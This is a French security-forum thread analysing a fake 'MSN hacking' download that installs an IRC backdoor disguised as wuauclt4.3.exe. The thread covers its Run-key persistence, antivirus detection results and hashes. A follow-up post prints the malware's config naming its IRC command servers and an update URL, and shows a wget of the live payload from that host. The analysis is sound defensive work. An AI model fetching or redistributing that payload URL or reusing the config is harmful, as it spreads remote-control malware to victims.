hxxp://hackmsn.site.voila.fr/index.html

Informations sur les arnaques et Virus sur MSN.
Malekal_morte
Messages : 117019
Inscription : 10 sept. 2005 13:57

hxxp://hackmsn.site.voila.fr/index.html

par Malekal_morte »

Un bon cas d'école avec un malware commun... ce dernier est proposé sur le site : hxxp://hackmsn.site.voila.fr/index.html

Le programme soit disant proposé est un programme qui permet d'hacker des comptes MSN, captures à l'appuie.
La page est assez grossière mais on doutera pas qu'il y aura bien des internautes sans cervelles qui voudront faire les malins en téléchargeant le dit programme.
Image

Une fois exécuté, le programme créé le fichier C:\WINDOWS\system32\wuauclt4.3.exe, ce qui est mauvais signe puisque le nom reprend celui d'un processus légitime Windows wuauclt.exe, histoire de mieux tromper le propriétaire du PC.

Image

wuauclt4.3.exe souhaite ensuite se charger à chaque démarrage de l'ordinateur ce qui est aussi mauvais signe.

Image

Enfin le programme effectue une connexion vers le port 6667 qui est le port IRC.

Image

Pour résumer nous avons affaire à une IRC Backdoor qui permet le contrôle du PC à distance.
L'ordinateur est alors transformer en Machine Zombi.

Un petit dump des strings en mémoire nous montre les diverses commandes IRC du client IRC embarqué
Image

Tout ça pour dire qu'on peut très facilement éviter cette infection quand on utilise un peu son cerveau et que l'on fait attention à ce que l'on télécharge.

La ligne HijackThis ajoutée, on retrouve donc notre fichier wuauclt4.3.exe qui se charge au démarrage via cette clef Run.
O4 - HKCU\..\Run: [Optimisation] C:\WINDOWS\system32\wuauclt4.3.exe

Au vu de la détection actuelle (qui va évoluer car je vais envoyer le fichier en antivirus), il ne faut bien sûr pas compter sur son antivirus pour vous sauver.
File wuauclt4.3.exe received on 08.27.2008 22:41:33 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 5/36 (13.89%)
Loading server information...


Antivirus Version Last Update Result
AhnLab-V3 2008.8.27.1 2008.08.27 -
AntiVir 7.8.1.23 2008.08.27 -
Authentium 5.1.0.4 2008.08.27 W32/IRCBot-based!Maximus
Avast 4.8.1195.0 2008.08.27 -
AVG 8.0.0.161 2008.08.27 -
BitDefender 7.2 2008.08.27 -
CAT-QuickHeal 9.50 2008.08.26 -
ClamAV 0.93.1 2008.08.27 -
DrWeb 4.44.0.09170 2008.08.27 DLOADER.IRC.Trojan
eSafe 7.0.17.0 2008.08.26 -
eTrust-Vet 31.6.6050 2008.08.26 -
Ewido 4.0 2008.08.27 -
F-Prot 4.4.4.56 2008.08.27 W32/IRCBot-based!Maximus
F-Secure 7.60.13501.0 2008.08.27 -
Fortinet 3.14.0.0 2008.08.27 -
GData 2.0.7306.1023 2008.08.27 -
Ikarus T3.1.1.34.0 2008.08.27 -
K7AntiVirus 7.10.428 2008.08.25 -
Kaspersky 7.0.0.125 2008.08.27 -
McAfee 5371 2008.08.27 New Malware.b
Microsoft 1.3807 2008.08.25 -
NOD32v2 3393 2008.08.27 -
Norman 5.80.02 2008.08.27 -
Panda 9.0.0.4 2008.08.27 -
PCTools 4.4.2.0 2008.08.27 -
Prevx1 V2 2008.08.27 -
Rising 20.59.21.00 2008.08.27 -
Sophos 4.33.0 2008.08.27 -
Sunbelt 3.1.1582.1 2008.08.26 -
Symantec 10 2008.08.27 -
TheHacker 6.3.0.6.060 2008.08.23 -
TrendMicro 8.700.0.1004 2008.08.27 -
VBA32 3.12.8.4 2008.08.27 -
ViRobot 2008.8.27.1352 2008.08.27 -
VirusBuster 4.5.11.0 2008.08.27 -
Webwasher-Gateway 6.6.2 2008.08.27 Virus.Win32.FileInfector.gen (suspicious)
Additional information
File size: 573952 bytes
MD5...: 99d8f5f59bb6276f20bbac9163499e86
SHA1..: 7c96b0f831d9c7e7c6d75d9802bc0a965d3f344a
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Evaluer le site malekal.com
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 117019
Inscription : 10 sept. 2005 13:57

Re: hxxp://hackmsn.site.voila.fr/index.html

par Malekal_morte »

Le fichier ini joint utilisé par le malware
[Shell16]
PrivServer=irc.m3ct0n.net
PubServer=irc.quakenet.org
PrivServer_P=6667
PubServer_P=6667
Serveur=http://www.m3ct0n.net/update
Exec=update.exe
Ident=IRCc
Nick=NewIRCc
Auth=none
Pass_Auth=none
Auther=[email protected]
Release=1.000000
Version=4.300000

On retrouve notre malware :

Code : Tout sélectionner

malekalmorte@ubuntu:/tmp$ wget http://www.m3ct0n.net/update/update.exe
--23:04:24--  http://www.m3ct0n.net/update/update.exe
           => `update.exe'
Résolution de http://www.m3ct0n.net... 213.186.33.87
Connexion vers http://www.m3ct0n.net|213.186.33.87|:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK
Longueur: 573 952 (560K) [application/x-msdos-program]
malekalmorte@ubuntu:/tmp$ md5sum update.exe
99d8f5f59bb6276f20bbac9163499e86 update.exe


Le domaine m3ct0n.net est enregistré chez OVH
Domain Name: M3CT0N.NET
Registrar: OVH
Whois Server: whois.ovh.com
Referral URL: http://www.ovh.com
Name Server: DNS12.OVH.NET
Name Server: NS12.OVH.NET
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 24-jul-2008
Creation Date: 24-jul-2008
Expiration Date: 24-jul-2009
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Evaluer le site malekal.com
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Vers/Virus MSN et arnaques sur MSN »